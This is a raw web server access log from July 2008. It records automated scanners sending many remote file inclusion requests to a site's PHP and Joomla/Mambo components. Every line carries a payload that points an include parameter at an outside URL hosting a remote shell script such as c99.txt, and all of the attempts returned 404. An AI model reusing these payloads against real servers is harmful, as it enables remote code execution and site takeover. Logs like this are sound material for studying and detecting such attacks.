87.106.65.144 - - [20/Jul/2008:17:07:44 -0700] "GET /logs/access_070827.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.86.116 - - [20/Jul/2008:17:07:57 -0700] "GET /logs/access_080407.log%20//admin/business_inc/saveserver.php?thisdir=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:08:23 -0700] "GET /logs/access_070709.log//include/main.php?config[search_disp]=true&include_dir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:08:41 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:08:41 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:09:03 -0700] "GET /logs/access_080303.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:09:03 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:09:04 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:09:22 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:09:22 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
200.29.4.54 - - [20/Jul/2008:17:09:42 -0700] "GET /logs/access_080225.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:09:45 -0700] "GET /logs/access_080107.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:09:45 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:09:46 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:10:05 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:10:06 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
87.118.112.54 - - [20/Jul/2008:17:10:15 -0700] "GET //index.php?p=http://87.118.98.85/nautilus/nia.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:10:16 -0700] "GET /logs/access_080121.log///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:10:16 -0700] "GET ///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:10:17 -0700] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:10:21 -0700] "GET /logs/access_080107.log///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:10:21 -0700] "GET /logs/access.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
63.247.139.189 - - [20/Jul/2008:17:10:21 -0700] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
63.247.139.189 - - [20/Jul/2008:17:10:21 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
87.118.112.54 - - [20/Jul/2008:17:10:32 -0700] "GET //index.php?p=http://87.118.98.85/nautilus/nia.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
78.40.96.160 - - [20/Jul/2008:17:10:39 -0700] "GET //index.php?lang=en&page=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
78.40.96.160 - - [20/Jul/2008:17:10:40 -0700] "GET /logs//index.php?lang=en&page=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:10:45 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
211.247.226.253 - - [20/Jul/2008:17:11:36 -0700] "GET /logs/access_080218.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:11:52 -0700] "GET /logs/access_080331.log//index.php?_REQUEST=&_REQUEST[option]=com_mambelfish&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:11:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_mambelfish&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:11:53 -0700] "GET /logs/access_080303.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:11:55 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:11:59 -0700] "GET /logs/access_070716.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:12:04 -0700] "GET /logs/access_071022.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:12:24 -0700] "GET /logs/access_080609.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:12:24 -0700] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:12:24 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:12:25 -0700] "GET ///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:12:34 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:12:34 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.103.23.40 - - [20/Jul/2008:17:12:48 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.chonil.co.kr/zboard/lost/motd/01.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:12:56 -0700] "GET //include/admin.lib.inc.php?site_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
80.87.131.174 - - [20/Jul/2008:17:13:04 -0700] "GET /logs/access_080407.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.87.131.174 - - [20/Jul/2008:17:13:04 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.87.131.174 - - [20/Jul/2008:17:13:04 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:13:24 -0700] "GET /logs/access_080324.log/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:13:24 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:17:13:45 -0700] "GET /logs/access_080630.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:17:13:45 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:17:13:46 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:14:26 -0700] "GET /logs/access_080324.log/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:14:26 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:14:26 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:15:13 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:15:41 -0700] "GET /logs/access_071022.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:17:16 -0700] "GET /logs/access_071008.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:17:17 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:17:17 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:17:43 -0700] "GET /logs/access_071112.log//_theme/breadcrumb.php?rootBase=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:17:43 -0700] "GET //_theme/breadcrumb.php?rootBase=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:17:47 -0700] "GET /logs/access_071105.log//_theme/breadcrumb.php?rootBase=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:18:00 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:18:08 -0700] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:18:14 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:18:15 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
85.114.135.126 - - [20/Jul/2008:17:18:15 -0700] "GET /home.php?paginaftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.135.126 - - [20/Jul/2008:17:18:15 -0700] "GET /logs/home.php?paginaftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.86.116 - - [20/Jul/2008:17:18:50 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.86.116 - - [20/Jul/2008:17:18:50 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.86.116 - - [20/Jul/2008:17:18:50 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.10.22 - - [20/Jul/2008:17:18:57 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.22 - - [20/Jul/2008:17:18:58 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.22 - - [20/Jul/2008:17:18:58 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
85.114.135.126 - - [20/Jul/2008:17:19:22 -0700] "GET /logs/access_080526.log/home.php?paginaftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.226.64.33 - - [20/Jul/2008:17:19:30 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.226.64.33 - - [20/Jul/2008:17:19:30 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.226.64.33 - - [20/Jul/2008:17:19:31 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.230.33 - - [20/Jul/2008:17:19:45 -0700] "GET /logs/access_080121.log//step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
207.44.230.33 - - [20/Jul/2008:17:19:46 -0700] "GET //step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
207.44.230.33 - - [20/Jul/2008:17:19:46 -0700] "GET /logs//step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
205.234.252.183 - - [20/Jul/2008:17:19:48 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
205.234.252.183 - - [20/Jul/2008:17:19:48 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
205.234.252.183 - - [20/Jul/2008:17:19:48 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:19:56 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:19:56 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:19:56 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:19:58 -0700] "GET /logs/access_071112.log//index.php?_REQUEST=&_REQUEST[option]=com_mambelfish&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.29.4.54 - - [20/Jul/2008:17:19:58 -0700] "GET /logs/access_071029.log//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:20:02 -0700] "GET /logs/access_071008.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:20:03 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:20:03 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.29.4.54 - - [20/Jul/2008:17:20:04 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.29.4.54 - - [20/Jul/2008:17:20:10 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.230.33 - - [20/Jul/2008:17:20:27 -0700] "GET /logs/access_071028.log//step_one.php?server_inc=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:20:28 -0700] "GET /logs/access_080204.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:20:29 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:20:29 -0700] "GET /logs/access_071029.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
77.221.130.8 - - [20/Jul/2008:17:20:30 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.8 - - [20/Jul/2008:17:20:30 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.8 - - [20/Jul/2008:17:20:30 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:20:32 -0700] "GET /logs/access_080204.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
